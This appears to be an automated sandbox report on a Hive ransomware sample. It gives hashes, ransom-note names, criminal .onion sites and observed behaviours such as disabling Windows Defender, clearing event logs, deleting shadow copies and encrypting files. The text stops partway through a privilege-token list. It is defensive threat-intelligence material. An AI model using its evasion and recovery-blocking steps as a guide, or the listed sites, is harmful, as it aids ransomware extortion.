Analysis
-
max time kernel
4294371s -
max time network
325s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
20-03-2022 00:34
Static task
static1
Behavioral task
behavioral1
Sample
89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe
Resource
win10v2004-en-20220113
General
-
Target
89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe
-
Size
4.0MB
-
MD5
4659444b7bbab080d3234579ad0998b3
-
SHA1
f0744f0825f967180eae995ce733d7b82ccb8db0
-
SHA256
89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b
-
SHA512
601cb4f7be6742fef403efd67d581040a693204113ba6427e99c3789d76c423b340708c0bb7f84d638520a991485051b4b1dd6406f5a0f6e2ec353bdcd918258
Malware Config
Extracted
C:\xG7b_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2128 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2068 bcdedit.exe 2088 bcdedit.exe -
Modifies extensions of user files 24 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\RevokeFind.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\CheckpointOpen.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\CheckpointResume.crw => C:\Users\Admin\Pictures\CheckpointResume.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\CopyUndo.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\ReadWatch.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\RevokeFind.crw => C:\Users\Admin\Pictures\RevokeFind.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\DisableSplit.crw => C:\Users\Admin\Pictures\DisableSplit.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\DisableSplit.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\UndoNew.tif => C:\Users\Admin\Pictures\UndoNew.tif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\CheckpointOpen.png => C:\Users\Admin\Pictures\CheckpointOpen.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\CompareImport.raw => C:\Users\Admin\Pictures\CompareImport.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\CompareImport.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\ConvertFromPing.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\ConvertFromSet.raw => C:\Users\Admin\Pictures\ConvertFromSet.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\ConvertFromPing.crw => C:\Users\Admin\Pictures\ConvertFromPing.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\CopyUndo.crw => C:\Users\Admin\Pictures\CopyUndo.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\SearchMove.png => C:\Users\Admin\Pictures\SearchMove.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\SearchMove.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\UndoNew.tif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\CheckpointResume.crw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\ConvertFromSet.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\JoinAdd.raw => C:\Users\Admin\Pictures\JoinAdd.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Users\Admin\Pictures\JoinAdd.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File renamed C:\Users\Admin\Pictures\ReadWatch.raw => C:\Users\Admin\Pictures\ReadWatch.raw.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee100.tlb.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Spades\es-ES\ShvlRes.dll.mui.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\RSSFeeds.js 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\DVD Maker\offset.ax 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18207_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SPANISH.LNG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File created C:\Program Files\Microsoft Games\Chess\fr-FR\xG7b_HOW_TO_DECRYPT.txt 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0234687.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\tab_on.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01065_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_right.png 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\settings.css 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00523_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\localizedStrings.js 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Clarity.eftx.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PICCAP98.POC.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\setup_wm.exe.mui 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\settings.js 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcfr.dll.mui 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\THMBNAIL.PNG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\LoanAmortization.xltx.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\js\settings.js 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\xG7b_HOW_TO_DECRYPT.txt 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02268_.WMF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\xG7b_HOW_TO_DECRYPT.txt 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\drag.png 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Sidebar\es-ES\Sidebar.exe.mui 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01300_.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Groove.en-us\SETUP.XML.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_IAAAACAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF.4Ca1t2FYttvanlkLvxCL2qaIXdnv4GaaSN7_pCVKPxD_AAAAAAAAAAA0.4g3j7 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1620 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2596 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2628 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2160 powershell.exe 2260 powershell.exe 1520 89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 864 wevtutil.exe Token: SeBackupPrivilege 864 wevtutil.exe Token: SeSecurityPrivilege 1696 wevtutil.exe Token: SeBackupPrivilege 1696 wevtutil.exe Token: SeSecurityPrivilege 1392 wevtutil.exe Token: SeBackupPrivilege 1392 wevtutil.exe Token: SeIncreaseQuotaPrivilege 520 wmic.exe Token: SeSecurityPrivilege 520 wmic.exe Token: SeTakeOwnershipPrivilege 520 wmic.exe Token: SeLoadDriverPrivilege 520 wmic.exe Token: SeSystemProfilePrivilege 520 wmic.exe Token: SeSystemtimePrivilege 520 wmic.exe Token: SeProfSingleProcessPrivilege 520 wmic.exe Token: SeIncBasePriorityPrivilege 520 wmic.exe Token: SeCreatePagefilePrivilege 520 wmic.exe Token: SeBackupPrivilege 520 wmic.exe Token: SeRestorePrivilege 520 wmic.exe Token: SeShutdownPrivilege 520 wmic.exe Token: SeDebugPrivilege 520 wmic.exe Token: SeSystemEnvironmentPrivilege 520 wmic.exe Token: SeRemoteShutdownPrivilege 520 wmic.exe Token: SeUndockPrivilege 520 wmic.exe Token: SeManageVolumePrivilege 520 wmic.exe Token: 33 520 wmic.exe Token: 34 520 wmic.exe Token: 35 520 wmic.exe Token: SeIncreaseQuotaPrivilege 2032 wmic.exe Token: SeSecurityPrivilege 2032 wmic.exe Token: SeTakeOwnershipPrivilege 2032 wmic.exe Token: SeLoadDriverPrivilege 2032 wmic.exe Token: SeSystemProfilePrivilege 2032 wmic.exe Token: 